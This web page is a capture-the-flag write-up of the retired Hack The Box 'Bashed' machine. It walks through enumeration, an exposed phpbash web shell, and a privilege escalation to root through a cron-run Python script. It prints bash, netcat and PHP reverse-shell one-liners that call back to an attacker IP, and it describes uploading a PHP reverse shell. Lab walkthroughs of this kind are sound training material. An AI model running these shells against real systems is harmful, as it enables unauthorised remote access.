<!-- Fix MathJax rendering on iOS Safari due to rendering long numbers as phone numbers. -->




<!doctype html>
<html lang="en" class="no-js">
  <head>
    
	
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta http-equiv="x-ua-compatible" content="ie=edge">
      
        <meta name="description" content="A compilation of writeups for the website- [**https://www.hackthebox.eu/](https://www.hackthebox.eu/**).">
      
      
        <link rel="canonical" href="http://hackthebox-solutions.github.io/Retired/Bashed Writeup/">
      
      
        <meta name="author" content="Rushi Chaudhari">
      
      
        <meta name="lang:clipboard.copy" content="Copy to clipboard">
      
        <meta name="lang:clipboard.copied" content="Copied to clipboard">
      
        <meta name="lang:search.language" content="en">
      
        <meta name="lang:search.pipeline.stopwords" content="True">
      
        <meta name="lang:search.pipeline.trimmer" content="True">
      
        <meta name="lang:search.result.none" content="No matching documents">
      
        <meta name="lang:search.result.one" content="1 matching document">
      
        <meta name="lang:search.result.other" content="# matching documents">
      
        <meta name="lang:search.tokenizer" content="[\s\-]+">
      
      <link rel="shortcut icon" href="../../assets/favicon.png">
      <meta name="generator" content="mkdocs-1.0.4, mkdocs-material-4.6.0">
    
	<meta name="format-detection" content="telephone=no">

    
      
        <title>35. Bashed Writeup.md - Hackthebox Solutions</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/application.1b62728e.css">
      
        <link rel="stylesheet" href="../../assets/stylesheets/application-palette.a8b3c06d.css">
      
      
        
        
        <meta name="theme-color" content="#009688">
      
    
    
      <script src="../../assets/javascripts/modernizr.268332fc.js"></script>
    
    
      
        <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,400i,700%7CRoboto+Mono&display=fallback">
        <style>body,input{font-family:"Roboto","Helvetica Neue",Helvetica,Arial,sans-serif}code,kbd,pre{font-family:"Roboto Mono","Courier New",Courier,monospace}</style>
      
    
    <link rel="stylesheet" href="../../assets/fonts/material-icons.css">
    
    
      <link rel="stylesheet" href="../../css/katex.css">
    
      <link rel="stylesheet" href="../../css/custom.css">
    
      <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.11.1/dist/katex.min.css">
    
    
      
    
    
  </head>
  
    
    
    <body dir="ltr" data-md-color-primary="teal" data-md-color-accent="blue">
  
    <svg class="md-svg">
      <defs>
        
        
          <svg xmlns="http://www.w3.org/2000/svg" width="416" height="448" viewBox="0 0 416 448" id="__github"><path fill="currentColor" d="M160 304q0 10-3.125 20.5t-10.75 19T128 352t-18.125-8.5-10.75-19T96 304t3.125-20.5 10.75-19T128 256t18.125 8.5 10.75 19T160 304zm160 0q0 10-3.125 20.5t-10.75 19T288 352t-18.125-8.5-10.75-19T256 304t3.125-20.5 10.75-19T288 256t18.125 8.5 10.75 19T320 304zm40 0q0-30-17.25-51T296 232q-10.25 0-48.75 5.25Q229.5 240 208 240t-39.25-2.75Q130.75 232 120 232q-29.5 0-46.75 21T56 304q0 22 8 38.375t20.25 25.75 30.5 15 35 7.375 37.25 1.75h42q20.5 0 37.25-1.75t35-7.375 30.5-15 20.25-25.75T360 304zm56-44q0 51.75-15.25 82.75-9.5 19.25-26.375 33.25t-35.25 21.5-42.5 11.875-42.875 5.5T212 416q-19.5 0-35.5-.75t-36.875-3.125-38.125-7.5-34.25-12.875T37 371.5t-21.5-28.75Q0 312 0 260q0-59.25 34-99-6.75-20.5-6.75-42.5 0-29 12.75-54.5 27 0 47.5 9.875t47.25 30.875Q171.5 96 212 96q37 0 70 8 26.25-20.5 46.75-30.25T376 64q12.75 25.5 12.75 54.5 0 21.75-6.75 42 34 40 34 99.5z"/></svg>
        
      </defs>
    </svg>
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" data-md-component="overlay" for="__drawer"></label>
    
      <a href="#lets-dive-in" tabindex="1" class="md-skip">
        Skip to content
      </a>
    
    
      <header class="md-header" data-md-component="header">
  <nav class="md-header-nav md-grid">
    <div class="md-flex">
      <div class="md-flex__cell md-flex__cell--shrink">
        <a href="http://hackthebox-solutions.github.io" title="Hackthebox Solutions" class="md-header-nav__button md-logo">
          
            <i class="md-icon"></i>
          
        </a>
      </div>
      <div class="md-flex__cell md-flex__cell--shrink">
        <label class="md-icon md-icon--menu md-header-nav__button" for="__drawer"></label>
      </div>
      <div class="md-flex__cell md-flex__cell--stretch">
        <div class="md-flex__ellipsis md-header-nav__title" data-md-component="title">
          
            <span class="md-header-nav__topic">
              Hackthebox Solutions
            </span>
            <span class="md-header-nav__topic">
              
                35. Bashed Writeup.md
              
            </span>
          
        </div>
      </div>
      <div class="md-flex__cell md-flex__cell--shrink">
        
          <label class="md-icon md-icon--search md-header-nav__button" for="__search"></label>
          
<div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="query" data-md-state="active">
      <label class="md-icon md-search__icon" for="__search"></label>
      <button type="reset" class="md-icon md-search__icon" data-md-component="reset" tabindex="-1">
        &#xE5CD;
      </button>
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="result">
          <div class="md-search-result__meta">
            Type to start searching
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
        
      </div>
      
        <div class="md-flex__cell md-flex__cell--shrink">
          <div class="md-header-nav__source">
            


  

<a href="https://github.com/hackthebox-solutions/hackthebox-solutions.github.io/" title="Go to repository" class="md-source" data-md-source="github">
  
    <div class="md-source__icon">
      <svg viewBox="0 0 24 24" width="24" height="24">
        <use xlink:href="#__github" width="24" height="24"></use>
      </svg>
    </div>
  
  <div class="md-source__repository">
    hackthebox-solutions.github.io
  </div>
</a>
          </div>
        </div>
      
    </div>
  </nav>
</header>
    
    <div class="md-container">
      
        
      
      
      <main class="md-main" role="main">
        <div class="md-main__inner md-grid" data-md-component="container">
          
            
              <div class="md-sidebar md-sidebar--primary" data-md-component="navigation">
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    <nav class="md-nav md-nav--primary" data-md-level="0">
  <label class="md-nav__title md-nav__title--site" for="__drawer">
    <a href="http://hackthebox-solutions.github.io" title="Hackthebox Solutions" class="md-nav__button md-logo">
      
        <i class="md-icon"></i>
      
    </a>
    Hackthebox Solutions
  </label>
  
    <div class="md-nav__source">
      


  

<a href="https://github.com/hackthebox-solutions/hackthebox-solutions.github.io/" title="Go to repository" class="md-source" data-md-source="github">
  
    <div class="md-source__icon">
      <svg viewBox="0 0 24 24" width="24" height="24">
        <use xlink:href="#__github" width="24" height="24"></use>
      </svg>
    </div>
  
  <div class="md-source__repository">
    hackthebox-solutions.github.io
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      


  <li class="md-nav__item">
    <a href="../.." title="Preface" class="md-nav__link">
      Preface
    </a>
  </li>

    
      
      
      

  


  <li class="md-nav__item md-nav__item--active md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-2" type="checkbox" id="nav-2" checked>
    
    <label class="md-nav__link" for="nav-2">
      I Retired
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-2">
        I Retired
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../Access Writeup/" title="1. Access Writeup.md" class="md-nav__link">
      1. Access Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Jerry Writeup/" title="2. Jerry Writeup.md" class="md-nav__link">
      2. Jerry Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Blue Writeup wo Metasploit/" title="3. Blue Writeup w/o Metasploit.md" class="md-nav__link">
      3. Blue Writeup w/o Metasploit.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Blocky Writeup/" title="4. Blocky Writeup.md" class="md-nav__link">
      4. Blocky Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Calamity Writeup/" title="5. Calamity Writeup.md" class="md-nav__link">
      5. Calamity Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Devoops Writeup/" title="6. Devoops Writeup.md" class="md-nav__link">
      6. Devoops Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Apocalyst Writeup/" title="7. Apocalyst Writeup.md" class="md-nav__link">
      7. Apocalyst Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Poison Writeup wo Metasploit/" title="8. Poison Writeup w/o Metasploit.md" class="md-nav__link">
      8. Poison Writeup w/o Metasploit.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Postman Writeup/" title="9. Postman Writeup.md" class="md-nav__link">
      9. Postman Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Beep Writeup/" title="10. Beep Writeup.md" class="md-nav__link">
      10. Beep Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Help Writeup/" title="11. Help Writeup.md" class="md-nav__link">
      11. Help Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Mirai Writeup/" title="12. Mirai Writeup.md" class="md-nav__link">
      12. Mirai Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Curling Writeup/" title="13. Curling Writeup.md" class="md-nav__link">
      13. Curling Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Nibbles Writeup wo Metasploit/" title="14. Nibbles Writeup w/o Metasploit.md" class="md-nav__link">
      14. Nibbles Writeup w/o Metasploit.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Valentine Writeup wo Metasploit/" title="15. Valentine Writeup w/o Metasploit.md" class="md-nav__link">
      15. Valentine Writeup w/o Metasploit.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Popcorn Writeups/" title="16. Popcorn Writeups.md" class="md-nav__link">
      16. Popcorn Writeups.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Cronos Writeup/" title="17. Cronos Writeup.md" class="md-nav__link">
      17. Cronos Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Legacy Writeup/" title="18. Legacy Writeup.md" class="md-nav__link">
      18. Legacy Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Openadmin Writeup/" title="19. Openadmin Writeup.md" class="md-nav__link">
      19. Openadmin Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Bank Writeup/" title="20. Bank Writeup.md" class="md-nav__link">
      20. Bank Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Shocker Writeup wo Metasploit/" title="21. Shocker Writeup w/o Metasploit.md" class="md-nav__link">
      21. Shocker Writeup w/o Metasploit.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Luke Writeup/" title="22. Luke Writeup.md" class="md-nav__link">
      22. Luke Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Arctic Writeup wo Metasploit/" title="23. Arctic Writeup w/o Metasploit.md" class="md-nav__link">
      23. Arctic Writeup w/o Metasploit.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Granny Writeup/" title="24. Granny Writeup.md" class="md-nav__link">
      24. Granny Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Netmon Writeup/" title="25. Netmon Writeup.md" class="md-nav__link">
      25. Netmon Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Sense Writeup wo Metasploit/" title="26. Sense Writeup w/o Metasploit.md" class="md-nav__link">
      26. Sense Writeup w/o Metasploit.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Sunday Writeup wo Metasploit/" title="27. Sunday Writeup w/o Metasploit.md" class="md-nav__link">
      27. Sunday Writeup w/o Metasploit.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Solidstate Writeup wo Metasploit/" title="28. Solidstate Writeup w/o Metasploit.md" class="md-nav__link">
      28. Solidstate Writeup w/o Metasploit.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Celestial Writeup/" title="29. Celestial Writeup.md" class="md-nav__link">
      29. Celestial Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Tenten Writeup/" title="30. Tenten Writeup.md" class="md-nav__link">
      30. Tenten Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Optimum Writeup/" title="31. Optimum Writeup.md" class="md-nav__link">
      31. Optimum Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Haircut Writeup/" title="32. Haircut Writeup.md" class="md-nav__link">
      32. Haircut Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Irked Writeup/" title="33. Irked Writeup.md" class="md-nav__link">
      33. Irked Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Chatterbox Writeup wo Metasploit/" title="34. Chatterbox Writeup w/o Metasploit.md" class="md-nav__link">
      34. Chatterbox Writeup w/o Metasploit.md
    </a>
  </li>

        
          
          
          

  


  <li class="md-nav__item md-nav__item--active">
    
    <input class="md-toggle md-nav__toggle" data-md-toggle="toc" type="checkbox" id="__toc">
    
    
      <label class="md-nav__link md-nav__link--active" for="__toc">
        35. Bashed Writeup.md
      </label>
    
    <a href="./" title="35. Bashed Writeup.md" class="md-nav__link md-nav__link--active">
      35. Bashed Writeup.md
    </a>
    
      
<nav class="md-nav md-nav--secondary">
  
  
  
    <label class="md-nav__title" for="__toc">Table of contents</label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#lets-dive-in" class="md-nav__link">
    Let’s dive in!
  </a>
  
    <nav class="md-nav">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#nmap" class="md-nav__link">
    Nmap
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#website" class="md-nav__link">
    Website
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#gobuster" class="md-nav__link">
    GoBuster
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#web-based-shell" class="md-nav__link">
    Web-Based Shell
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#pen-test-monkey" class="md-nav__link">
    Pen-Test Monkey
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#kali-machine" class="md-nav__link">
    Kali Machine
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#moral" class="md-nav__link">
    Moral
  </a>
  
</li>
      
      
      
      
      
    </ul>
  
</nav>
    
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Lame Writeup/" title="36. Lame Writeup.md" class="md-nav__link">
      36. Lame Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Grandpa Writeup/" title="37. Grandpa Writeup.md" class="md-nav__link">
      37. Grandpa Writeup.md
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Swagshop Writeup/" title="38. Swagshop Writeup.md" class="md-nav__link">
      38. Swagshop Writeup.md
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              <div class="md-sidebar md-sidebar--secondary" data-md-component="toc">
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    
<nav class="md-nav md-nav--secondary">
  
  
  
    <label class="md-nav__title" for="__toc">Table of contents</label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#lets-dive-in" class="md-nav__link">
    Let’s dive in!
  </a>
  
    <nav class="md-nav">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#nmap" class="md-nav__link">
    Nmap
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#website" class="md-nav__link">
    Website
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#gobuster" class="md-nav__link">
    GoBuster
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#web-based-shell" class="md-nav__link">
    Web-Based Shell
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#pen-test-monkey" class="md-nav__link">
    Pen-Test Monkey
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#kali-machine" class="md-nav__link">
    Kali Machine
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#moral" class="md-nav__link">
    Moral
  </a>
  
</li>
      
      
      
      
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          <div class="md-content">
            <article class="md-content__inner md-typeset">
              
                
                  <a href="https://github.com/hackthebox-solutions/hackthebox-solutions.github.io/edit/master/docs/Retired/Bashed Writeup.md" title="Edit this page" class="md-icon md-content__icon">&#xE3C9;</a>
                
                
                  <h1>35. Bashed Writeup.md</h1>
                
                <blockquote>
<p>So, I just started with <a href="https://www.hackthebox.eu">HackTheBox</a> and the whole idea is truly amazing to have online CTF for hackers all around the world to practise and hone their skills. Another shoutout to <a href="https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA">IPPSEC</a>, the images used in this writeup are taken from his videos for better understanding.</p>
</blockquote>
<p><img alt="" src="../../img/Bashed Writeup/1_aAkyWaBpV_4i3GzPuNDStA.png" /></p>
<p>This article is an easy to understand step by step process where I explain in detail one of the process of how to gain root access to the “bashed” machine.</p>
<h2 id="lets-dive-in">Let’s dive in!</h2>
<p>Connecting to hackthebox machine and setting up OpenVPN you can watch it <a href="https://www.youtube.com/watch?v=yB0_YVSaHiY">here</a>. So, I won’t discuss more about it and get into the core part where we start opening the doors one by one. The main goal is to gain root access to the bashed linux box and for now we only know its IP address ( 10.10.10.68 ).</p>
<h3 id="nmap">Nmap</h3>
<p>This is the first step that you will be carrying out in any CTF, where you need to hack into a machine as we need to figure out the ports i.e. gateways from where we can enter into the machine and Nmap is the best tool for it out there.</p>
<div class="highlight"><pre><span></span><span class="lineno" data-linenos="1 "></span>nmap -sC -sV 10.10.10.168
</pre></div>

<p>The above command was the first one that I ran to figure out the ports that were open on the mahcine.</p>
<p><img alt="Nmap output" src="../../img/Bashed Writeup/1_p1-Crv9tg2ewiJHi1PGJhQ.png" /></p>
<p>The port 80 was open, except that nothing was open. Port 80 is one of the most common ports that you will find open on the vulnerable machines.</p>
<h3 id="website">Website</h3>
<p>So once we figure this out then I straight away opened the website, <a href="http://10.10.10.68">http://10.10.10.68</a>.</p>
<p><img alt="" src="../../img/Bashed Writeup/1_6bcPx28Bf-JUOXeXY2vF3g.png" /></p>
<p>This is mostly the first step, as the website in itself will lead you onto different clues and hints to break into the vulnerable machine.</p>
<p>So once we open the website in our browser, we are presented with this page.</p>
<p>This webpage has a link to a page where there described about phpbash and an image of a web-based shell command prompt is present.</p>
<p><img alt="" src="../../img/Bashed Writeup/1_AguoI4k2oHVLeEk_FUwt6Q.png" /></p>
<p>This page also provides us with a link to the <a href="https://github.com/Arrexel/phpbash">Github page of phpbash</a> where the code for the phpbash was present.</p>
<p>The web-based shell gives us an idea that to hack the machine maybe we will need to launch the web shell that is being talked about.</p>
<h3 id="gobuster">GoBuster</h3>
<p>Now, the second step we take while we receive an open port 80 or 443 is to use GoBuster to carry out a detailed search about the subdomains that might be present on this machine as those lead us to our clue in the next step.</p>
<p><img alt="subdomain search by GoBuster" src="../../img/Bashed Writeup/1_wSHQZBrAOgXAXHoFPUHKpA.png" /></p>
<p>In the step to find out different subdomains we find a few listed above. We first visit the /uploads subdomain it was a blank white page.</p>
<p><img alt="/dev subdomain" src="../../img/Bashed Writeup/1_6y7VTJc3-CN4_B0dTS8syA.png" /></p>
<p>Then we went onto /php subdomain it contained the following data, exposing the sendMail.php file.</p>
<p>Then we went onto the dev/ subdomain and there we came across the phpbash.php script which was a link to a web-based shell that was exposed for us to get into the next level to achieve root access.</p>
<h3 id="web-based-shell">Web-Based Shell</h3>
<p>The web-based shell gave us access to a command line to run our commands, this a big step as now we have a command line to work with.</p>
<p><img alt="" src="../../img/Bashed Writeup/1_fTKTUikPVlwgPQTXww9K5w.png" /></p>
<p>So, as soon we got this shell, we will run our basic commands to figure out the extent of privileges we currently have.</p>
<p>The first command is “id” to know the details about the user. So we are currently a user named, www-data.</p>
<p>Now to check the privileges we have we will run a <a href="https://netsec.ws/?p=309">script</a> to figure that out. To do that we need the script to be present on the vulnerable machine, so the first step will be to bring over the script from our machine to this machine.</p>
<p>First of all we download the required script on our machine and then send it over to the folder where we are storing data regarding the bashed machine. Once the script is present on that particular folder then we setup a httpServer so the contents of the folder will be available across the network.</p>
<p><img alt="Linux privilege checker script" src="../../img/Bashed Writeup/1_9i9igCCgeYi3ElNAmdmIcA.png" /></p>
<p>Now, that we have setup the httpServer on our machine. We go back to the web-based shell on the vulnerable machine because as soon as the file is uploaded via the httpServer now we can download it on our machine using “curl” or “wget” commands.</p>
<p>Curl command wasn’t present on this machine, so we had to use wget to download the file over to the vulnerable machine.</p>
<div class="highlight"><pre><span></span><span class="lineno" data-linenos="1 "></span>var/www/html/dev# wget 10.10.14.30/LinEnum.sh
</pre></div>

<p>The permission was denied when the above command was carried out from the given folder, we then to the /dev/shm directory and the above command worked.</p>
<p>Once, we had the LinEnum.sh file we executed it to figure out the privileges and other details regarding the current user.</p>
<div class="highlight"><pre><span></span><span class="lineno" data-linenos="1 "></span>var/www/html/dev/shm# bash LinEnum.sh
</pre></div>

<p>We obtained the following results:</p>
<ul>
<li>
<p>The linux version is updated so there were extremely less chances of finding any vulnerability here.</p>
</li>
<li>
<p>Currently our userid is (www-data), there is another user by the name of scriptmanager.</p>
</li>
<li>
<p>We can use sudo without a password &amp; scriptmanager can run anything.</p>
</li>
<li>
<p>The web shell that we have currently is not persistent.</p>
<blockquote>
<p>To check this out, we run the command</p>
</blockquote>
<p>sudo -u scriptmanager bash</p>
<blockquote>
<p>and</p>
</blockquote>
<p>python -c ‘import pty;pty.spwan(“/bin/bash”)’ </p>
<blockquote>
<p>but still we are www-data</p>
</blockquote>
</li>
</ul>
<p>So, the web shell that we have obtained wasn’t persistent and we needed to obtain a persistent shell so we had to execute a reverse shell.</p>
<h3 id="pen-test-monkey"><a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">Pen-Test Monkey</a></h3>
<p>To make a reverse shell connection to the vulnerable machine we go to the cheat sheet list that is presented by the Pen-Test Monkey. It is an extremely useful tool.</p>
<p>The first step is to setup a listener on our machine, where the reverse shell would pop up. So, once the listener is up we pass several commands in the web-based shell in the vulnerable machine to initiate the reverse shell (don’t forget to change the IP address &amp; port number).</p>
<p><img alt="" src="../../img/Bashed Writeup/1_3eQmU860zlpWGoaoSvTuQg.png" /></p>
<p><strong>Bash</strong></p>
<div class="highlight"><pre><span></span><span class="lineno" data-linenos="1 "></span>bash -i &gt;&amp; /dev/tcp/10.10.14.38/8081 0&gt;&amp;1
</pre></div>

<p><strong>Netcat</strong></p>
<div class="highlight"><pre><span></span><span class="lineno" data-linenos="1 "></span>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.38 8081 &gt;/tmp/f
</pre></div>

<p><strong>PHP</strong></p>
<div class="highlight"><pre><span></span><span class="lineno" data-linenos="1 "></span>php -r &#39;$sock=fsockopen(&quot;10.10.14.38”,8081);exec(&quot;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#39;
</pre></div>

<p>After all these attempts we are still unable to launch a reverse shell. Then we try to upload a php reverse shell. Earlier when we were using GoBuster we came across a domain /uploads. We go to the particular directory in the vulnerable machine and try creating a file and see if we have the permission to do so, we type in the command</p>
<div class="highlight"><pre><span></span><span class="lineno" data-linenos="1 "></span>var/www/html/uploads# touch test
</pre></div>

<p>We opened the browser to check if the URL <a href="http://10.10.10.68/uploads/test">http://10.10.10.68/uploads/test</a> works or not and lucky for us it worked.</p>
<p>Then we copy over the php-reverse-shell.php file to our folder where we stored the LinEnum.sh files and using wget we download the php file in the vulnerable machine as we did before. We make the required changes to the php file, like changing the IP address and the port number to listen on.</p>
<p><img alt="" src="../../img/Bashed Writeup/1_qcbjWdw-Yd0fB3PlwZMosQ.png" /></p>
<p>We transfer the php-reverse-shell.php file to the uploads folder and then we visit the URL <a href="http://10.10.10.68/uploads/php-reverse-shell.php">http://10.10.10.68/uploads/php-reverse-shell.php</a> on the browser. As soon as we visit this website the reverse shell pops up on our machine.</p>
<p><img alt="Reverse shell" src="../../img/Bashed Writeup/1_n7Xai-PstMooRS32udoa8w.png" /></p>
<h3 id="kali-machine">Kali Machine</h3>
<p>We are back on our Kali machine where the reverse shell just spawned. We again carry out the basic commands to check what is the user privilege we have, if the shell is persistent or not. So the shell is persistent and we are still www-data.</p>
<p>To change ourselves from www-data to scriptmanager we run the following commands</p>
<div class="highlight"><pre><span></span><span class="lineno" data-linenos="1 "></span>$ sudo -u scriptmanager bash
</pre></div>

<p>After executing the above command we again check which user we are and now we are scriptmanager.</p>
<p>Now we do an “ls -la” to see over which files and folders the scriptmanager has read, write or execute privileges. There is a folder named scripts with privileges assigned to the scriptmanager, we go inside it and again carry out “ls -la” to get the details about the files present in the scripts folder.</p>
<p><img alt="" src="../../img/Bashed Writeup/1_RZKpVgJlPXxUaTBSb4Jf9g.png" /></p>
<p><img alt="" src="../../img/Bashed Writeup/1_Qv5CegdtG3zaOKm0r9Ym0g.png" /></p>
<p>There are two files one of them is test.py which is under scriptmanager and the other file test.txt is under root, so we know now that we have to work with these two files now.</p>
<p><img alt="test.py (../img/Bashed Writeup/1_xj_P7Bon7U-Jm3flNXP6zg.png )" src="https://cdn-images-1.medium.com/max/2000/1*xj_P7Bon7U-Jm3flNXP6zg.png" /></p>
<p>We open the test.py and then analyse the code written within it, the code written in the test.py states to print “testing 123!” in the test.txt file. There is one thing that is hard to notice but the test.txt file is updated every minute, we figure this when we carry out the “ls -la” command and see that every minute the test.txt file is updated.</p>
<p>This establish that there is a link between the test.py and test.txt and so whatever code we execute inside test.py those changes will take place as if changes are being made by a root user.</p>
<p>From pen-test monkey we copy a python script to launch a root shell on the vulnerable machine ( format it properly and make changes in the IP address and port number before saving )</p>
<p><img alt="test.py (../img/Bashed Writeup/1__xwRc-lEMQoYKk9EDTMsDA.png )" src="https://cdn-images-1.medium.com/max/2000/1*_xwRc-lEMQoYKk9EDTMsDA.png" /></p>
<p>Let the code run by itself or just type in “python test.py” and you should get a reverse shell, check the id and you should be root.</p>
<p><img alt="root access" src="../../img/Bashed Writeup/1_pryURuV-yWU_1qkeSNu_5A.png" /></p>
<p>And so that is how the bashed machine is hacked.</p>
<h2 id="moral">Moral</h2>
<p>Be familiar with the tools you use, make a clear mental list of the steps you need to take at every step. Don’t give up, that is one thing you will need a lot of while doing these CTFs and try to do them all by yourselves. It is tough in the beginning then you will slowly start to pick up steps along the way.</p>
                
                  
                
                
              
              
                


              
            </article>
          </div>
        </div>
      </main>
      
        
<footer class="md-footer">
  
    <div class="md-footer-nav">
      <nav class="md-footer-nav__inner md-grid">
        
          <a href="../Chatterbox Writeup wo Metasploit/" title="34. Chatterbox Writeup w/o Metasploit.md" class="md-flex md-footer-nav__link md-footer-nav__link--prev" rel="prev">
            <div class="md-flex__cell md-flex__cell--shrink">
              <i class="md-icon md-icon--arrow-back md-footer-nav__button"></i>
            </div>
            <div class="md-flex__cell md-flex__cell--stretch md-footer-nav__title">
              <span class="md-flex__ellipsis">
                <span class="md-footer-nav__direction">
                  Previous
                </span>
                34. Chatterbox Writeup w/o Metasploit.md
              </span>
            </div>
          </a>
        
        
          <a href="../Lame Writeup/" title="36. Lame Writeup.md" class="md-flex md-footer-nav__link md-footer-nav__link--next" rel="next">
            <div class="md-flex__cell md-flex__cell--stretch md-footer-nav__title">
              <span class="md-flex__ellipsis">
                <span class="md-footer-nav__direction">
                  Next
                </span>
                36. Lame Writeup.md
              </span>
            </div>
            <div class="md-flex__cell md-flex__cell--shrink">
              <i class="md-icon md-icon--arrow-forward md-footer-nav__button"></i>
            </div>
          </a>
        
      </nav>
    </div>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-footer-copyright">
        
          <div class="md-footer-copyright__highlight">
            Built by <a href="http://github.com/rushic24">Rushi</a> &copy; 2020
          </div>
        
        powered by
        <a href="https://www.mkdocs.org">MkDocs</a>
        and
        <a href="https://squidfunk.github.io/mkdocs-material/">
          Material for MkDocs</a>
      </div>
      
  <div class="md-footer-social">
    <link rel="stylesheet" href="../../assets/fonts/font-awesome.css">
    
      <a href="https://github.com/rushic24" class="md-footer-social__link fa fa-"></a>
    
      <a href="https://www.linkedin.com/in/rushichaudhari" class="md-footer-social__link fa fa-"></a>
    
      <a href="" class="md-footer-social__link fa fa-"></a>
    
  </div>

    </div>
  </div>
</footer>
      
    </div>
    
      <script src="../../assets/javascripts/application.808e90bb.js"></script>
      
